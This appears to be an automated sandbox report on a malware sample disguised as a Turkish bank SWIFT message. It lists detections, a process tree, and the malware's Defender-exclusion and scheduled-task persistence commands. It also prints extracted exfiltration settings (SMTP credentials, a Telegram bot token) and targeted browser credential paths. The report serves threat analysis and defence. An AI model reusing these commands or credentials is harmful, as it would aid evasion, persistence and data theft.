Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe

Overview

General Information

Sample name:Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe
Analysis ID:1564711
MD5:fa7dcecb3c5ac81610c93c6b91cda38a
SHA1:7359e8d92749a87655654a04671239dc7f300af9
SHA256:3ca1c11c2d4173581e8007b955c912dd1d6abdb1bafe03924aca8cba437df745
Tags:exegeoTURWormm0yvZiraatBankuser-abuse_ch
Infos:

Detection

AgentTesla, MassLogger RAT, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected AgentTesla
Yara detected MassLogger RAT
Yara detected PureLog Stealer
Yara detected Telegram RAT
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains very large strings
.NET source code references suspicious native API functions
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Binary is likely a compiled AutoIt script file
Contains functionality to capture screen (.Net source)
Contains functionality to log keystrokes (.Net Source)
Drops VBS files to the startup folder
Drops executable to a common third party application directory
Infects executable files (exe, dll, sys, html)
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: WScript or CScript Dropper
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found evasive API chain (date check)
Found evasive API chain (may stop execution after checking a module file name)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Uncommon Svchost Parent Process
Sigma detected: Use Short Name Path in Command Line
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe (PID: 4812 cmdline: "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe" MD5: FA7DCECB3C5AC81610C93C6B91CDA38A)
    • spadixes.exe (PID: 720 cmdline: "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe" MD5: FA7DCECB3C5AC81610C93C6B91CDA38A)
      • svchost.exe (PID: 5088 cmdline: "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
        • TrojanAI.exe (PID: 6340 cmdline: "C:\Users\user~1\AppData\Local\Temp\TrojanAI.exe" MD5: 50D015016F20DA0905FD5B37D7834823)
          • powershell.exe (PID: 3036 cmdline: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
            • conhost.exe (PID: 3964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • WmiPrvSE.exe (PID: 7524 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
          • schtasks.exe (PID: 3284 cmdline: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 12:31 /du 23:59 /sc daily /ri 1 /f MD5: 48C2FE20575769DE916F48EF0676A965)
            • conhost.exe (PID: 5780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • TrojanAIbot.exe (PID: 7276 cmdline: "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" MD5: 50D015016F20DA0905FD5B37D7834823)
          • cmd.exe (PID: 7300 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpA3B8.tmp.cmd"" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 7312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • timeout.exe (PID: 7352 cmdline: timeout 6 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
        • server02.exe (PID: 6012 cmdline: "C:\Users\user~1\AppData\Local\Temp\server02.exe" MD5: D49B97C9900DA1344E4E8481551CC14C)
        • neworigin.exe (PID: 520 cmdline: "C:\Users\user~1\AppData\Local\Temp\neworigin.exe" MD5: D6A4CF0966D24C1EA836BA9A899751E5)
  • armsvc.exe (PID: 4252 cmdline: "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe" MD5: 911868154988B08BC9EC4AF4D85832D3)
  • TrojanAIbot.exe (PID: 7252 cmdline: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe MD5: 50D015016F20DA0905FD5B37D7834823)
  • wscript.exe (PID: 7628 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\spadixes.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • spadixes.exe (PID: 7684 cmdline: "C:\Users\user\AppData\Local\bothsided\spadixes.exe" MD5: FA7DCECB3C5AC81610C93C6B91CDA38A)
      • svchost.exe (PID: 7708 cmdline: "C:\Users\user\AppData\Local\bothsided\spadixes.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • spadixes.exe (PID: 7744 cmdline: "C:\Users\user\AppData\Local\bothsided\spadixes.exe" MD5: FA7DCECB3C5AC81610C93C6B91CDA38A)
        • svchost.exe (PID: 7768 cmdline: "C:\Users\user\AppData\Local\bothsided\spadixes.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
        • spadixes.exe (PID: 7780 cmdline: "C:\Users\user\AppData\Local\bothsided\spadixes.exe" MD5: FA7DCECB3C5AC81610C93C6B91CDA38A)
          • svchost.exe (PID: 7812 cmdline: "C:\Users\user\AppData\Local\bothsided\spadixes.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
          • spadixes.exe (PID: 7828 cmdline: "C:\Users\user\AppData\Local\bothsided\spadixes.exe" MD5: FA7DCECB3C5AC81610C93C6B91CDA38A)
            • svchost.exe (PID: 7848 cmdline: "C:\Users\user\AppData\Local\bothsided\spadixes.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
              • TrojanAI.exe (PID: 7952 cmdline: "C:\Users\user~1\AppData\Local\Temp\TrojanAI.exe" MD5: 50D015016F20DA0905FD5B37D7834823)
  • TrojanAIbot.exe (PID: 8132 cmdline: "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" MD5: 50D015016F20DA0905FD5B37D7834823)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "SMTP", "Port": "587", "Host": "s82.gocheapweb.com", "Username": "info2@j-fores.com", "Password": "london@1759"}
{"EXfil Mode": "Telegram", "Telegram Token": "7795961032:AAHl2Gyn1IRHeiB38gCoc9MZJfyaE9R5m3s", "Telegram Chatid": "5330396417"}
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\server02.exeJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
    C:\Users\user\AppData\Local\Temp\server02.exeJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      C:\Users\user\AppData\Local\Temp\server02.exeJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        C:\Users\user\AppData\Local\Temp\server02.exeWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
        • 0x10191:$a1: get_encryptedPassword
        • 0x104cd:$a2: get_encryptedUsername
        • 0xff1e:$a3: get_timePasswordChanged
        • 0x1003f:$a4: get_passwordField
        • 0x101a7:$a5: set_encryptedPassword
        • 0x11b77:$a7: get_logins
        • 0x11828:$a8: GetOutlookPasswords
        • 0x11606:$a9: StartKeylogger
        • 0x11ac7:$a10: KeyLoggerEventArgs
        • 0x11663:$a11: KeyLoggerEventArgsEventHandler
        C:\Users\user\AppData\Local\Temp\server02.exeMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
        • 0x1541d:$a2: \Comodo\Dragon\User Data\Default\Login Data
        • 0x1491b:$a3: \Google\Chrome\User Data\Default\Login Data
        • 0x14c29:$a4: \Orbitum\User Data\Default\Login Data
        • 0x15a21:$a5: \Kometa\User Data\Default\Login Data
        Click to see the 3 entries
        SourceRuleDescriptionAuthorStrings
        00000022.00000003.1483462887.0000000008600000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          00000002.00000002.1285293466.0000000003CC0000.00000004.00001000.00020000.00000000.sdmpMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
          • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
          • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
          • 0x700:$s3: 83 EC 38 53 B0 CB 88 44 24 2B 88 44 24 2F B0 9A 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
          • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
          • 0x1e9d0:$s5: delete[]
          • 0x1de88:$s6: constructor or from DllMain.
          0000000D.00000002.3714279992.0000000002661000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            0000000D.00000002.3714279992.0000000002661000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              00000022.00000002.1577778530.0000000005E00000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                Click to see the 50 entries
                SourceRuleDescriptionAuthorStrings
                5.2.svchost.exe.5800f16.1.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  34.2.svchost.exe.8640000.8.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                    5.2.svchost.exe.8400000.11.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                      34.2.svchost.exe.7206478.3.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                        5.3.svchost.exe.8200000.17.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                          Click to see the 113 entries

                          System Summary

                          barindex
                          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user~1\AppData\Local\Temp\TrojanAI.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\TrojanAI.exe, ParentProcessId: 6340, ParentProcessName: TrojanAI.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , ProcessId: 3036, ProcessName: powershell.exe
                          Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\spadixes.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\spadixes.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\spadixes.vbs" , ProcessId: 7628, ProcessName: wscript.exe
                          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user~1\AppData\Local\Temp\TrojanAI.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\TrojanAI.exe, ParentProcessId: 6340, ParentProcessName: TrojanAI.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , ProcessId: 3036, ProcessName: powershell.exe
                          Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\TrojanAI.exe, ProcessId: 6340, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TrojanAIbot.exe.lnk
                          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 12:31 /du 23:59 /sc daily /ri 1 /f, CommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 12:31 /du 23:59 /sc daily /ri 1 /f, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user~1\AppData\Local\Temp\TrojanAI.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\TrojanAI.exe, ParentProcessId: 6340, ParentProcessName: TrojanAI.exe, ProcessCommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 12:31 /du 23:59 /sc daily /ri 1 /f, ProcessId: 3284, ProcessName: schtasks.exe
                          Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 51.195.88.199, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\AppData\Local\Temp\neworigin.exe, Initiated: true, ProcessId: 520, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49705
                          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 12:31 /du 23:59 /sc daily /ri 1 /f, CommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 12:31 /du 23:59 /sc daily /ri 1 /f, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user~1\AppData\Local\Temp\TrojanAI.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\TrojanAI.exe, ParentProcessId: 6340, ParentProcessName: TrojanAI.exe, ProcessCommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 12:31 /du 23:59 /sc daily /ri 1 /f, ProcessId: 3284, ProcessName: schtasks.exe
                          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe", CommandLine: "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe", ParentImage: C:\Users\user\AppData\Local\bothsided\spadixes.exe, ParentProcessId: 720, ParentProcessName: spadixes.exe, ProcessCommandLine: "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe", ProcessId: 5088, ProcessName: svchost.exe
                          Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: "C:\Users\user~1\AppData\Local\Temp\TrojanAI.exe" , CommandLine: "C:\Users\user~1\AppData\Local\Temp\TrojanAI.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\TrojanAI.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\TrojanAI.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\TrojanAI.exe, ParentCommandLine: "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe", ParentImage: C:\Windows\SysWOW64\svchost.exe, ParentProcessId: 5088, ParentProcessName: svchost.exe, ProcessCommandLine: "C:\Users\user~1\AppData\Local\Temp\TrojanAI.exe" , ProcessId: 6340, ProcessName: TrojanAI.exe
                          Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\spadixes.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\spadixes.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\spadixes.vbs" , ProcessId: 7628, ProcessName: wscript.exe
                          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user~1\AppData\Local\Temp\TrojanAI.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\TrojanAI.exe, ParentProcessId: 6340, ParentProcessName: TrojanAI.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , ProcessId: 3036, ProcessName: powershell.exe
                          Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe", CommandLine: "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe", ParentImage: C:\Users\user\AppData\Local\bothsided\spadixes.exe, ParentProcessId: 720, ParentProcessName: spadixes.exe, ProcessCommandLine: "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe", ProcessId: 5088, ProcessName: svchost.exe

                          Data Obfuscation

                          barindex
                          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\bothsided\spadixes.exe, ProcessId: 720, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\spadixes.vbs
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-11-28T18:27:11.192599+010020181411A Network Trojan was detected54.244.188.17780192.168.2.749738TCP
                          2024-11-28T18:27:15.606360+010020181411A Network Trojan was detected18.141.10.10780192.168.2.749745TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-11-28T18:27:11.192599+010020377711A Network Trojan was detected54.244.188.17780192.168.2.749738TCP
                          2024-11-28T18:27:15.606360+010020377711A Network Trojan was detected18.141.10.10780192.168.2.749745TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-11-28T18:26:53.571947+010028032742Potentially Bad Traffic192.168.2.749701132.226.8.16980TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-11-28T18:27:18.221469+010028508511Malware Command and Control Activity Detected192.168.2.74975354.244.188.17780TCP

                          Click to jump to signature section

                          Show All Signature Results

                          AV Detection

                          barindex
                          Source: C:\Windows\System32\alg.exeAvira: detection malicious, Label: W32/Infector.Gen
                          Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exeAvira: detection malicious, Label: HEUR/AGEN.1311721
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeAvira: detection malicious, Label: TR/ATRAPS.Gen
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeAvira: detection malicious, Label: W32/Infector.Gen
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeAvira: detection malicious, Label: HEUR/AGEN.1311721
                          Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeAvira: detection malicious, Label: W32/Infector.Gen
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeAvira: detection malicious, Label: TR/Spy.Gen8
                          Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeAvira: detection malicious, Label: W32/Infector.Gen
                          Source: 00000005.00000002.1302736160.000000000704E000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: MassLogger {"EXfil Mode": "Telegram", "Telegram Token": "7795961032:AAHl2Gyn1IRHeiB38gCoc9MZJfyaE9R5m3s", "Telegram Chatid": "5330396417"}
                          Source: 5.2.svchost.exe.6f05570.4.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "s82.gocheapweb.com", "Username": "info2@j-fores.com", "Password": "london@1759"}
                          Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exeReversingLabs: Detection: 91%
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeReversingLabs: Detection: 81%
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeReversingLabs: Detection: 83%
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeReversingLabs: Detection: 91%
                          Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeReversingLabs: Detection: 42%
                          Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                          Source: C:\Windows\System32\alg.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeJoe Sandbox ML: detected
                          Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJoe Sandbox ML: detected
                          Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeJoe Sandbox ML: detected

                          Location Tracking

                          barindex
                          Source: unknownDNS query: name: reallyfreegeoip.org
                          Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                          Source: unknownHTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.7:49704 version: TLS 1.0
                          Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.7:49702 version: TLS 1.2
                          Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: svchost.exe, 00000005.00000003.1284856650.00000000080A0000.00000004.00001000.00020000.00000000.sdmp
                          Source: Binary string: ALG.pdbGCTL source: svchost.exe, 00000005.00000003.1293877990.0000000008A00000.00000004.00001000.00020000.00000000.sdmp, alg.exe.5.dr
                          Source: Binary string: _.pdb source: svchost.exe, 00000005.00000002.1302736160.0000000006F05000.00000004.00000800.00020000.00000000.sdmp
